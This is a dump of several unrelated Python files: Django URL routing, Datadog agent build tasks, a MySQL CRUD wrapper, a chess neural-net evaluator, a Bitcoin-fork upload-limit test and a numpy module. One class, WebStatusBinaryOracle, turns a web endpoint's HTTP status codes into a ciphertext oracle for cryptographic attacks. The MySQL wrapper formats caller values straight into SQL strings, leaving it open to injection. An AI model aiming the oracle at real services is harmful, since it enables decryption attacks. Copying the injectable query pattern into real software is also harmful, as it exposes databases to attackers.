Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
import xadmin
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
# path('admin/', admin.site.urls),
path(r'', xadmin.site.urls),
] |
py | 1a37eafe6bdb9915aa0557a9b6df3cc7e6ecd17c | """
Agent namespaced tasks
"""
from __future__ import print_function
import glob
import os
import shutil
import sys
import platform
from distutils.dir_util import copy_tree
import invoke
from invoke import task
from invoke.exceptions import Exit
from .utils import bin_name, get_build_flags, get_version_numeric_only, load_release_versions
from .utils import REPO_PATH
from .build_tags import get_build_tags, get_default_build_tags, LINUX_ONLY_TAGS, DEBIAN_ONLY_TAGS
from .go import deps
# constants
BIN_PATH = os.path.join(".", "bin", "agent")
AGENT_TAG = "datadog/agent:master"
DEFAULT_BUILD_TAGS = [
"apm",
"consul",
"cpython",
"docker",
"ec2",
"etcd",
"gce",
"jmx",
"kubeapiserver",
"kubelet",
"log",
"systemd",
"process",
"snmp",
"zk",
"zlib",
]
@task
def build(ctx, rebuild=False, race=False, build_include=None, build_exclude=None,
puppy=False, use_embedded_libs=False, development=True, precompile_only=False,
skip_assets=False):
"""
Build the agent. If the bits to include in the build are not specified,
the values from `invoke.yaml` will be used.
    Example invocation:
inv agent.build --build-exclude=snmp,systemd
"""
build_include = DEFAULT_BUILD_TAGS if build_include is None else build_include.split(",")
build_exclude = [] if build_exclude is None else build_exclude.split(",")
ldflags, gcflags, env = get_build_flags(ctx, use_embedded_libs=use_embedded_libs)
if not sys.platform.startswith('linux'):
for ex in LINUX_ONLY_TAGS:
if ex not in build_exclude:
build_exclude.append(ex)
# remove all tags that are only available on debian distributions
distname = platform.linux_distribution()[0].lower()
if distname not in ['debian', 'ubuntu']:
for ex in DEBIAN_ONLY_TAGS:
if ex not in build_exclude:
build_exclude.append(ex)
if sys.platform == 'win32':
# This generates the manifest resource. The manifest resource is necessary for
# being able to load the ancient C-runtime that comes along with Python 2.7
# command = "rsrc -arch amd64 -manifest cmd/agent/agent.exe.manifest -o cmd/agent/rsrc.syso"
ver = get_version_numeric_only(ctx)
build_maj, build_min, build_patch = ver.split(".")
command = "windmc --target pe-x86-64 -r cmd/agent cmd/agent/agentmsg.mc "
ctx.run(command, env=env)
command = "windres --define MAJ_VER={build_maj} --define MIN_VER={build_min} --define PATCH_VER={build_patch} ".format(
build_maj=build_maj,
build_min=build_min,
build_patch=build_patch
)
command += "-i cmd/agent/agent.rc --target=pe-x86-64 -O coff -o cmd/agent/rsrc.syso"
ctx.run(command, env=env)
if puppy:
# Puppy mode overrides whatever passed through `--build-exclude` and `--build-include`
build_tags = get_default_build_tags(puppy=True)
else:
build_tags = get_build_tags(build_include, build_exclude)
cmd = "go build {race_opt} {build_type} -tags \"{go_build_tags}\" "
cmd += "-o {agent_bin} -gcflags=\"{gcflags}\" -ldflags=\"{ldflags}\" {REPO_PATH}/cmd/agent"
args = {
"race_opt": "-race" if race else "",
"build_type": "-a" if rebuild else ("-i" if precompile_only else ""),
"go_build_tags": " ".join(build_tags),
"agent_bin": os.path.join(BIN_PATH, bin_name("agent", android=False)),
"gcflags": gcflags,
"ldflags": ldflags,
"REPO_PATH": REPO_PATH,
}
ctx.run(cmd.format(**args), env=env)
# Render the configuration file template
#
# We need to remove cross compiling bits if any because go generate must
# build and execute in the native platform
env.update({
"GOOS": "",
"GOARCH": "",
})
cmd = "go generate {}/cmd/agent"
ctx.run(cmd.format(REPO_PATH), env=env)
if not skip_assets:
refresh_assets(ctx, development=development)
@task
def refresh_assets(ctx, development=True):
"""
Clean up and refresh Collector's assets and config files
"""
# ensure BIN_PATH exists
if not os.path.exists(BIN_PATH):
os.mkdir(BIN_PATH)
dist_folder = os.path.join(BIN_PATH, "dist")
if os.path.exists(dist_folder):
shutil.rmtree(dist_folder)
copy_tree("./cmd/agent/dist/", dist_folder)
copy_tree("./pkg/status/dist/", dist_folder)
copy_tree("./cmd/agent/gui/views", os.path.join(dist_folder, "views"))
if development:
copy_tree("./dev/dist/", dist_folder)
# copy the dd-agent placeholder to the bin folder
bin_ddagent = os.path.join(BIN_PATH, "dd-agent")
shutil.move(os.path.join(dist_folder, "dd-agent"), bin_ddagent)
@task
def run(ctx, rebuild=False, race=False, build_include=None, build_exclude=None,
puppy=False, skip_build=False):
"""
Execute the agent binary.
By default it builds the agent before executing it, unless --skip-build was
passed. It accepts the same set of options as agent.build.
"""
if not skip_build:
build(ctx, rebuild, race, build_include, build_exclude, puppy)
ctx.run(os.path.join(BIN_PATH, bin_name("agent")))
@task
def system_tests(ctx):
"""
Run the system testsuite.
"""
pass
@task
def image_build(ctx, base_dir="omnibus"):
"""
Build the docker image
"""
base_dir = base_dir or os.environ.get("OMNIBUS_BASE_DIR")
pkg_dir = os.path.join(base_dir, 'pkg')
list_of_files = glob.glob(os.path.join(pkg_dir, 'datadog-agent*_amd64.deb'))
# get the last debian package built
if not list_of_files:
print("No debian package build found in {}".format(pkg_dir))
print("See agent.omnibus-build")
raise Exit(code=1)
latest_file = max(list_of_files, key=os.path.getctime)
shutil.copy2(latest_file, "Dockerfiles/agent/")
ctx.run("docker build -t {} Dockerfiles/agent".format(AGENT_TAG))
ctx.run("rm Dockerfiles/agent/datadog-agent*_amd64.deb")
@task
def integration_tests(ctx, install_deps=False, race=False, remote_docker=False):
"""
Run integration tests for the Agent
"""
if install_deps:
deps(ctx)
test_args = {
"go_build_tags": " ".join(get_default_build_tags()),
"race_opt": "-race" if race else "",
"exec_opts": "",
}
if remote_docker:
test_args["exec_opts"] = "-exec \"inv docker.dockerize-test\""
go_cmd = 'go test {race_opt} -tags "{go_build_tags}" {exec_opts}'.format(**test_args)
prefixes = [
"./test/integration/config_providers/...",
"./test/integration/corechecks/...",
"./test/integration/listeners/...",
"./test/integration/util/kubelet/...",
]
for prefix in prefixes:
ctx.run("{} {}".format(go_cmd, prefix))
@task(help={'skip-sign': "On macOS, use this option to build an unsigned package if you don't have Datadog's developer keys."})
def omnibus_build(ctx, puppy=False, log_level="info", base_dir=None, gem_path=None,
skip_deps=False, skip_sign=False, release_version="nightly", omnibus_s3_cache=False):
"""
Build the Agent packages with Omnibus Installer.
"""
if not skip_deps:
deps(ctx, no_checks=True) # no_checks since the omnibus build installs checks with a dedicated software def
# omnibus config overrides
overrides = []
# base dir (can be overridden through env vars, command line takes precedence)
base_dir = base_dir or os.environ.get("OMNIBUS_BASE_DIR")
if base_dir:
overrides.append("base_dir:{}".format(base_dir))
overrides_cmd = ""
if overrides:
overrides_cmd = "--override=" + " ".join(overrides)
with ctx.cd("omnibus"):
env = load_release_versions(ctx, release_version)
cmd = "bundle install"
if gem_path:
cmd += " --path {}".format(gem_path)
ctx.run(cmd, env=env)
omnibus = "bundle exec omnibus.bat" if sys.platform == 'win32' else "bundle exec omnibus"
cmd = "{omnibus} build {project_name} --log-level={log_level} {populate_s3_cache} {overrides}"
args = {
"omnibus": omnibus,
"project_name": "puppy" if puppy else "agent",
"log_level": log_level,
"overrides": overrides_cmd,
"populate_s3_cache": ""
}
if omnibus_s3_cache:
args['populate_s3_cache'] = " --populate-s3-cache "
if skip_sign:
env['SKIP_SIGN_MAC'] = 'true'
ctx.run(cmd.format(**args), env=env)
@task
def clean(ctx):
"""
Remove temporary objects and binary artifacts
"""
# go clean
print("Executing go clean")
ctx.run("go clean")
# remove the bin/agent folder
print("Remove agent binary folder")
ctx.run("rm -rf ./bin/agent")
|
py | 1a37eb2adabd9d49eb82870c2dfeb63dcb59e0b4 | import pymysql
from .function import create_insert_sql_values, create_update_sql, create_insert_sql_column
from . import SQLConfig
class MySqldb(object):
def __init__(self):
self.SQLConfig = SQLConfig
# self.db = pymysql.connect(SQLConfig.SQL_ADDRESS,SQLConfig.SQL_USERNAME,\
# SQLConfig.SQL_PASSWORD,SQLConfig.SQL_DATABASE)
def connect(self):
self.db = pymysql.connect(self.SQLConfig.SQL_ADDRESS,self.SQLConfig.SQL_USERNAME,\
self.SQLConfig.SQL_PASSWORD,self.SQLConfig.SQL_DATABASE)
    # There are just four kinds of methods: create, delete, update and read (CRUD).
    # Create, i.e. insert.
    # Insert takes two arguments: the table to insert into, and the data.
    # The data must be a dict.
def insert(self, table, values):
if not isinstance(values,dict):
raise TypeError('values must be dict')
if not isinstance(table,str):
raise TypeError('table must be str')
cursor = self.db.cursor()
        # Build the SQL statement
sql = "INSERT INTO %s%s VALUES %s"%(table,\
create_insert_sql_column(values),create_insert_sql_values(values))
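        # e.g. this renders something like INSERT INTO users(id,name) VALUES (1,'alice'),
        # assuming the helper functions format the column list and value tuple that way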
try:
cursor.execute(sql)
self.db.commit()
return True
except:
print('insert fail')
return False
    # Delete, with only two arguments:
    # the table name and a condition.
def delete(self, table, condition):
if not isinstance(condition,dict):
raise TypeError('condition must be dict')
if not isinstance(table,str):
raise TypeError('table must be str')
cursor = self.db.cursor()
sql = "DELETE FROM %s WHERE %s = '%s'" % \
(table,list(condition.keys())[0],condition[list(condition.keys())[0]])
try:
cursor.execute(sql)
self.db.commit()
return True
except:
print('delete fail')
return False
    # Update.
    # Arguments, in order: table name, values to change, lookup condition.
def update(self, table, values, condition):
if not isinstance(condition,dict):
raise TypeError('condition must be dict')
if not isinstance(values,dict):
raise TypeError('values must be dict')
if not isinstance(table,str):
raise TypeError('table must be str')
cursor = self.db.cursor()
sql = "UPDATE %s SET %s WHERE %s = '%s'"%\
(table,create_update_sql(values),list(condition.keys())[0],condition[list(condition.keys())[0]])
try:
print(sql)
cursor.execute(sql)
self.db.commit()
return True
except:
print("update fail")
return False
    # Read all rows.
    # Argument: the table name.
def list_all(self, table):
if not isinstance(table,str):
raise TypeError('table must be str')
cursor = self.db.cursor()
        # Fetch the table's column names
sql = "select COLUMN_NAME from information_schema.COLUMNS where table_name = '%s'"%(table)
cursor.execute(sql)
table_name = cursor.fetchall()
table_column = []
for i in table_name:
table_column.append(i[0])
sql = "SELECT * FROM %s" % (table)
try:
cursor.execute(sql)
table_data = []
data = cursor.fetchall()
for i in data:
table_data.append(dict(zip(table_column,list(i))))
return table_data
except:
print('get fail')
return False
def list_one(self, table, condition):
if not isinstance(condition,dict):
raise TypeError('condition must be dict')
if not isinstance(table,str):
raise TypeError('table must be str')
cursor = self.db.cursor()
        # Fetch the table's column names
sql = "select COLUMN_NAME from information_schema.COLUMNS where table_name = '%s'"%(table)
cursor.execute(sql)
table_name = cursor.fetchall()
table_column = []
for i in table_name:
table_column.append(i[0])
sql = "SELECT * FROM %s WHERE %s = '%s'" % (table,\
list(condition.keys())[0], condition[list(condition.keys())[0]])
try:
cursor.execute(sql)
table_data = []
data = cursor.fetchall()
for i in data:
table_data.append(dict(zip(table_column,list(i))))
return table_data
except:
print("list one fail")
return False
def list_column(self, table, columns):
if not isinstance(table,str):
raise TypeError('table must be str')
if not isinstance(columns,list):
raise TypeError('columns must be list')
cursor = self.db.cursor()
sql = "SELECT %s FROM %s" % (",".join(columns),table)
try:
cursor.execute(sql)
data = cursor.fetchall()
columnData = []
for i in data:
columnData.append(i[0])
return columnData
except:
print("list one fail")
return False
def close(self):
        self.db.close()
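# Minimal usage sketch (illustrative; assumes SQLConfig points at a reachable
# MySQL server with a `users` table that has `id` and `name` columns):
#
#     db = MySqldb()
#     db.connect()
#     db.insert("users", {"id": 1, "name": "alice"})
#     db.update("users", {"name": "bob"}, {"id": 1})
#     print(db.list_one("users", {"id": 1}))
#     db.close()
 |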
py | 1a37eb3389c9c44c338607bf2cb7d804e6b35802 | from oracles.abstract_oracle import *
from json import loads
import requests
class WebStatusBinaryOracle(AbstractOracle):
name = 'web_status_boolean_oracle'
description = 'Creates a binary oracle based on HTTP status code'
arguments = [OracleArgumentDescription('url','Base URL', True),
OracleArgumentDescription('verb', 'HTTP Method for the request', False, defaultValue='GET'),
OracleArgumentDescription('cipherparam', 'Parameter that contains the ciphertext', True),
OracleArgumentDescription('params', 'Other parameters to add to the request', False, defaultValue='{}'),
OracleArgumentDescription('goodstatuses', 'Comma separated list of good status codes', True),
]
def makeoracle(self):
url = self.get_argument_value('url')
verb = self.get_argument_value('verb')
cipherparam = self.get_argument_value('cipherparam')
paramstring = self.get_argument_value('params')
params = loads(paramstring)
goodstatuses = set(map(int,self.get_argument_value('goodstatuses').split(',')))
def oracle(ctext):
params[cipherparam] = ctext
if verb == 'GET':
resp = requests.get(url,params=params)
else:
resp = requests.post(url,params=params)
return resp.status_code in goodstatuses
return oracle |
py | 1a37ebd61e32dea222f3f267e299ebcb987aad1e | # Copyright 2021 Karan Sharma - [email protected]
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import chess
import tensorflow as tf
from tensorflow import keras
import numpy as np
piece_cp_values = {
chess.PAWN: 100,
chess.KNIGHT: 300,
chess.BISHOP: 300,
chess.ROOK: 500,
chess.QUEEN: 900,
chess.KING: 0
}
def boardToOneHotNNInput(board: chess.Board):
    # Encode the board as 64 squares x 5 feature channels (pawn, knight,
    # bishop, rook, king): sign encodes the colour, and a queen activates
    # the bishop and rook channels together.
    array = np.zeros(320, dtype=int)
    piecesDict = board.piece_map()
white_map = {
chess.PAWN: [100, 0, 0, 0, 0],
chess.KNIGHT: [0, 100, 0, 0, 0],
chess.BISHOP: [0, 0, 100, 0, 0],
chess.ROOK: [0, 0, 0, 100, 0],
chess.QUEEN: [0, 0, 133, 100, 0],
chess.KING: [0, 0, 0, 0, 100]
}
black_map = {
chess.PAWN: [-100, 0, 0, 0, 0],
chess.KNIGHT: [0, -100, 0, 0, 0],
chess.BISHOP: [0, 0, -100, 0, 0],
chess.ROOK: [0, 0, 0, -100, 0],
chess.QUEEN: [0, 0, -133, -100, 0],
chess.KING: [0, 0, 0, 0, -100]
}
data_map = {
chess.WHITE: white_map,
chess.BLACK: black_map
}
for square in piecesDict:
piece = piecesDict.get(square)
array[square*5:(square+1)*5] = data_map[piece.color][piece.piece_type]
return np.array([array])
class Evaluator:
    def __init__(self, model: keras.Model):
        self.model = model
    @classmethod
    def from_layer_sizes(cls, num_inputs: int, hidden_layer_sizes=[32, 32]):
        # Alternative constructor: build a fresh fully-connected network
        input = keras.Input(shape=(num_inputs,))
        x = input
        for size in hidden_layer_sizes:
            x = keras.layers.Dense(size, activation="relu")(x)
        output = keras.layers.Dense(1)(x)
        return cls(keras.Model(inputs=input, outputs=output))
    def func(self, board: chess.Board) -> float:
        return 0.0
    @classmethod
    def randomModelFromModel(cls, model: keras.Model, deviation=1):
        new_model = keras.models.clone_model(model)
        for layer in new_model.layers:
            # get_weights() returns a list of arrays; perturb each array
            layer.set_weights([np.random.uniform(w - deviation, w + deviation)
                               for w in layer.get_weights()])
        return Evaluator(new_model)
class Evaluator_Type3(Evaluator):
def func(self, board: chess.Board) -> float:
return self.model.predict(boardToOneHotNNInput(board))
class ColorError(Exception):
"""Raised if the wrong chess color was detected"""
pass
class Engine:
def __init__(self, evaluator: Evaluator, color: chess.Color):
self.evaluator = evaluator
self.color = color
def best_move(self, board: chess.Board) -> chess.Move:
if board.turn != self.color:
raise ColorError
def is_better(x, y):
if self.color == chess.WHITE:
return x > y
else:
return y > x
high = None
best_move = None
for move in board.legal_moves:
board.push(move)
rating = self.evaluator.func(board)
print("Considering " + move.uci() + ": " + str(rating)) #DEBUG
if high is None or is_better(rating, high):
high = rating
best_move = move
board.pop()
return best_move
# -------------------------------------------------- DEPRECATED CODE -------------------------------------------------
def boardToNNInput_deprecated(board: chess.Board):
array = np.zeros(64, dtype=int)
piecesDict = board.piece_map()
for square in piecesDict:
if piecesDict.get(square).color == chess.WHITE:
array[square] = piece_cp_values[piecesDict.get(square).piece_type]
else:
array[square] = -piece_cp_values[piecesDict.get(square).piece_type]
return np.array([array])
class Evaluator_Type1_deprecated(Evaluator):
def func(self, board: chess.Board) -> float:
input = boardToNNInput_deprecated(board)
print("SHAPE:" + str(input.shape))
return self.model.predict(input)
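# Minimal usage sketch (illustrative; an untrained network makes the chosen
# move essentially arbitrary):
#
#     board = chess.Board()
#     evaluator = Evaluator_Type3.from_layer_sizes(320)
#     engine = Engine(evaluator, chess.WHITE)
#     print(engine.best_move(board).uci())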
|
py | 1a37ed157ebce18cbfaf2ef6c4f23324e1bffb2f | #!/usr/bin/env python2
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
'''
Test behavior of -maxuploadtarget.
* Verify that getdata requests for old blocks (>1week) are dropped
if uploadtarget has been reached.
* Verify that getdata requests for recent blocks are respected even
if uploadtarget has been reached.
* Verify that the upload counters are reset after 24 hours.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to send
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
self.block_receive_map = {}
def add_connection(self, conn):
self.connection = conn
self.peer_disconnected = False
def on_inv(self, conn, message):
pass
# Track the last getdata message we receive (used in the test)
def on_getdata(self, conn, message):
self.last_getdata = message
def on_block(self, conn, message):
message.block.calc_sha256()
try:
self.block_receive_map[message.block.sha256] += 1
except KeyError as e:
self.block_receive_map[message.block.sha256] = 1
# Spin until verack message is received from the node.
# We use this to signal that our test can begin. This
# is called from the testing thread, so it needs to acquire
# the global lock.
def wait_for_verack(self):
def veracked():
return self.verack_received
return wait_until(veracked, timeout=10)
def wait_for_disconnect(self):
def disconnected():
return self.peer_disconnected
return wait_until(disconnected, timeout=10)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
def on_close(self, conn):
self.peer_disconnected = True
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
def received_pong():
return (self.last_pong.nonce == self.ping_counter)
self.connection.send_message(msg_ping(nonce=self.ping_counter))
success = wait_until(received_pong, timeout)
self.ping_counter += 1
return success
class MaxUploadTest(BitcoinTestFramework):
def __init__(self):
self.utxo = []
self.txouts = gen_return_txouts()
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("NETAVOD", "netavod"),
help="netavod binary to test")
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
# Start a node with maxuploadtarget of 200 MB (/24h)
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug", "-maxuploadtarget=200", "-blockmaxsize=999000"]))
def mine_full_block(self, node, address):
# Want to create a full block
        # We'll generate a 66k transaction below, and 14 of them come close to the 1MB block limit
for j in xrange(14):
if len(self.utxo) < 14:
self.utxo = node.listunspent()
inputs=[]
outputs = {}
t = self.utxo.pop()
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
remchange = t["amount"] - Decimal("0.001000")
outputs[address]=remchange
            # Create a basic transaction that will send change back to ourselves after accounting for a fee,
            # and then insert the 128 generated transaction outs in the middle. rawtx[92] is where the number
            # of txouts is stored and is the only thing we overwrite from the original transaction.
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + self.txouts
newtx = newtx + rawtx[94:]
# Appears to be ever so slightly faster to sign with SIGHASH_NONE
signresult = node.signrawtransaction(newtx,None,None,"NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
# Mine a full sized block which will be these transactions we just created
node.generate(1)
def run_test(self):
# Before we connect anything, we first set the time on the node
# to be in the past, otherwise things break because the CNode
# time counters can't be reset backward after initialization
old_time = int(time.time() - 2*60*60*24*7)
self.nodes[0].setmocktime(old_time)
# Generate some old blocks
self.nodes[0].generate(130)
# test_nodes[0] will only request old blocks
# test_nodes[1] will only request new blocks
# test_nodes[2] will test resetting the counters
test_nodes = []
connections = []
for i in xrange(3):
test_nodes.append(TestNode())
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_nodes[i]))
test_nodes[i].add_connection(connections[i])
NetworkThread().start() # Start up network handling in another thread
[x.wait_for_verack() for x in test_nodes]
# Test logic begins here
# Now mine a big block
self.mine_full_block(self.nodes[0], self.nodes[0].getnewaddress())
# Store the hash; we'll request this later
big_old_block = self.nodes[0].getbestblockhash()
old_block_size = self.nodes[0].getblock(big_old_block, True)['size']
big_old_block = int(big_old_block, 16)
# Advance to two days ago
self.nodes[0].setmocktime(int(time.time()) - 2*60*60*24)
# Mine one more block, so that the prior block looks old
self.mine_full_block(self.nodes[0], self.nodes[0].getnewaddress())
# We'll be requesting this new block too
big_new_block = self.nodes[0].getbestblockhash()
new_block_size = self.nodes[0].getblock(big_new_block)['size']
big_new_block = int(big_new_block, 16)
# test_nodes[0] will test what happens if we just keep requesting the
# the same big old block too many times (expect: disconnect)
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(2, big_old_block))
max_bytes_per_day = 200*1024*1024
daily_buffer = 144 * MAX_BLOCK_SIZE
max_bytes_available = max_bytes_per_day - daily_buffer
success_count = max_bytes_available // old_block_size
# 144MB will be reserved for relaying new blocks, so expect this to
# succeed for ~70 tries.
for i in xrange(success_count):
test_nodes[0].send_message(getdata_request)
test_nodes[0].sync_with_ping()
assert_equal(test_nodes[0].block_receive_map[big_old_block], i+1)
assert_equal(len(self.nodes[0].getpeerinfo()), 3)
# At most a couple more tries should succeed (depending on how long
# the test has been running so far).
for i in xrange(3):
test_nodes[0].send_message(getdata_request)
test_nodes[0].wait_for_disconnect()
assert_equal(len(self.nodes[0].getpeerinfo()), 2)
print "Peer 0 disconnected after downloading old block too many times"
# Requesting the current block on test_nodes[1] should succeed indefinitely,
# even when over the max upload target.
# We'll try 200 times
getdata_request.inv = [CInv(2, big_new_block)]
for i in xrange(200):
test_nodes[1].send_message(getdata_request)
test_nodes[1].sync_with_ping()
assert_equal(test_nodes[1].block_receive_map[big_new_block], i+1)
print "Peer 1 able to repeatedly download new block"
# But if test_nodes[1] tries for an old block, it gets disconnected too.
getdata_request.inv = [CInv(2, big_old_block)]
test_nodes[1].send_message(getdata_request)
test_nodes[1].wait_for_disconnect()
assert_equal(len(self.nodes[0].getpeerinfo()), 1)
print "Peer 1 disconnected after trying to download old block"
print "Advancing system time on node to clear counters..."
# If we advance the time by 24 hours, then the counters should reset,
# and test_nodes[2] should be able to retrieve the old block.
self.nodes[0].setmocktime(int(time.time()))
test_nodes[2].sync_with_ping()
test_nodes[2].send_message(getdata_request)
test_nodes[2].sync_with_ping()
assert_equal(test_nodes[2].block_receive_map[big_old_block], 1)
print "Peer 2 able to download old block"
[c.disconnect_node() for c in connections]
#stop and start node 0 with 1MB maxuploadtarget, whitelist 127.0.0.1
print "Restarting nodes with -whitelist=127.0.0.1"
stop_node(self.nodes[0], 0)
self.nodes[0] = start_node(0, self.options.tmpdir, ["-debug", "-whitelist=127.0.0.1", "-maxuploadtarget=1", "-blockmaxsize=999000"])
#recreate/reconnect 3 test nodes
test_nodes = []
connections = []
for i in xrange(3):
test_nodes.append(TestNode())
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_nodes[i]))
test_nodes[i].add_connection(connections[i])
NetworkThread().start() # Start up network handling in another thread
[x.wait_for_verack() for x in test_nodes]
#retrieve 20 blocks which should be enough to break the 1MB limit
getdata_request.inv = [CInv(2, big_new_block)]
for i in xrange(20):
test_nodes[1].send_message(getdata_request)
test_nodes[1].sync_with_ping()
assert_equal(test_nodes[1].block_receive_map[big_new_block], i+1)
getdata_request.inv = [CInv(2, big_old_block)]
test_nodes[1].send_message(getdata_request)
test_nodes[1].wait_for_disconnect()
assert_equal(len(self.nodes[0].getpeerinfo()), 3) #node is still connected because of the whitelist
print "Peer 1 still connected after trying to download old block (whitelisted)"
[c.disconnect_node() for c in connections]
if __name__ == '__main__':
MaxUploadTest().main()
|
py | 1a37ed3e143e86d7ff47235d15c2d369090d8036 | """
Create the numpy.core.multiarray namespace for backward compatibility. In v1.16
the multiarray and umath c-extension modules were merged into a single
_multiarray_umath extension module. So we replicate the old namespace
by importing from the extension module.
"""
import functools
from . import overrides
from . import _multiarray_umath
from ._multiarray_umath import * # noqa: F403
# These imports are needed for backward compatibility,
# do not change them. issue gh-15518
# _get_ndarray_c_version is semi-public, on purpose not added to __all__
from ._multiarray_umath import (
_fastCopyAndTranspose, _flagdict, from_dlpack, _insert, _reconstruct,
_vec_string, _ARRAY_API, _monotonicity, _get_ndarray_c_version,
_set_madvise_hugepage,
)
__all__ = [
'_ARRAY_API', 'ALLOW_THREADS', 'BUFSIZE', 'CLIP', 'DATETIMEUNITS',
'ITEM_HASOBJECT', 'ITEM_IS_POINTER', 'LIST_PICKLE', 'MAXDIMS',
'MAY_SHARE_BOUNDS', 'MAY_SHARE_EXACT', 'NEEDS_INIT', 'NEEDS_PYAPI',
'RAISE', 'USE_GETITEM', 'USE_SETITEM', 'WRAP', '_fastCopyAndTranspose',
'_flagdict', 'from_dlpack', '_insert', '_reconstruct', '_vec_string',
'_monotonicity', 'add_docstring', 'arange', 'array', 'asarray',
'asanyarray', 'ascontiguousarray', 'asfortranarray', 'bincount',
'broadcast', 'busday_count', 'busday_offset', 'busdaycalendar', 'can_cast',
'compare_chararrays', 'concatenate', 'copyto', 'correlate', 'correlate2',
'count_nonzero', 'c_einsum', 'datetime_as_string', 'datetime_data',
'dot', 'dragon4_positional', 'dragon4_scientific', 'dtype',
'empty', 'empty_like', 'error', 'flagsobj', 'flatiter', 'format_longfloat',
'frombuffer', 'fromfile', 'fromiter', 'fromstring',
'get_handler_name', 'get_handler_version', 'inner', 'interp',
'interp_complex', 'is_busday', 'lexsort', 'matmul', 'may_share_memory',
'min_scalar_type', 'ndarray', 'nditer', 'nested_iters',
'normalize_axis_index', 'packbits', 'promote_types', 'putmask',
'ravel_multi_index', 'result_type', 'scalar', 'set_datetimeparse_function',
'set_legacy_print_mode', 'set_numeric_ops', 'set_string_function',
'set_typeDict', 'shares_memory', 'tracemalloc_domain', 'typeinfo',
'unpackbits', 'unravel_index', 'vdot', 'where', 'zeros']
# For backward compatibility, make sure pickle imports these functions from here
_reconstruct.__module__ = 'numpy.core.multiarray'
scalar.__module__ = 'numpy.core.multiarray'
from_dlpack.__module__ = 'numpy'
arange.__module__ = 'numpy'
array.__module__ = 'numpy'
asarray.__module__ = 'numpy'
asanyarray.__module__ = 'numpy'
ascontiguousarray.__module__ = 'numpy'
asfortranarray.__module__ = 'numpy'
datetime_data.__module__ = 'numpy'
empty.__module__ = 'numpy'
frombuffer.__module__ = 'numpy'
fromfile.__module__ = 'numpy'
fromiter.__module__ = 'numpy'
frompyfunc.__module__ = 'numpy'
fromstring.__module__ = 'numpy'
geterrobj.__module__ = 'numpy'
may_share_memory.__module__ = 'numpy'
nested_iters.__module__ = 'numpy'
promote_types.__module__ = 'numpy'
set_numeric_ops.__module__ = 'numpy'
seterrobj.__module__ = 'numpy'
zeros.__module__ = 'numpy'
# We can't verify dispatcher signatures because NumPy's C functions don't
# support introspection.
array_function_from_c_func_and_dispatcher = functools.partial(
overrides.array_function_from_dispatcher,
module='numpy', docs_from_dispatcher=True, verify=False)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.empty_like)
def empty_like(prototype, dtype=None, order=None, subok=None, shape=None):
"""
empty_like(prototype, dtype=None, order='K', subok=True, shape=None)
Return a new array with the same shape and type as a given array.
Parameters
----------
prototype : array_like
The shape and data-type of `prototype` define these same attributes
of the returned array.
dtype : data-type, optional
Overrides the data type of the result.
.. versionadded:: 1.6.0
order : {'C', 'F', 'A', or 'K'}, optional
Overrides the memory layout of the result. 'C' means C-order,
'F' means F-order, 'A' means 'F' if `prototype` is Fortran
contiguous, 'C' otherwise. 'K' means match the layout of `prototype`
as closely as possible.
.. versionadded:: 1.6.0
subok : bool, optional.
If True, then the newly created array will use the sub-class
type of `prototype`, otherwise it will be a base-class array. Defaults
to True.
shape : int or sequence of ints, optional.
Overrides the shape of the result. If order='K' and the number of
dimensions is unchanged, will try to keep order, otherwise,
order='C' is implied.
.. versionadded:: 1.17.0
Returns
-------
out : ndarray
Array of uninitialized (arbitrary) data with the same
shape and type as `prototype`.
See Also
--------
ones_like : Return an array of ones with shape and type of input.
zeros_like : Return an array of zeros with shape and type of input.
full_like : Return a new array with shape of input filled with value.
empty : Return a new uninitialized array.
Notes
-----
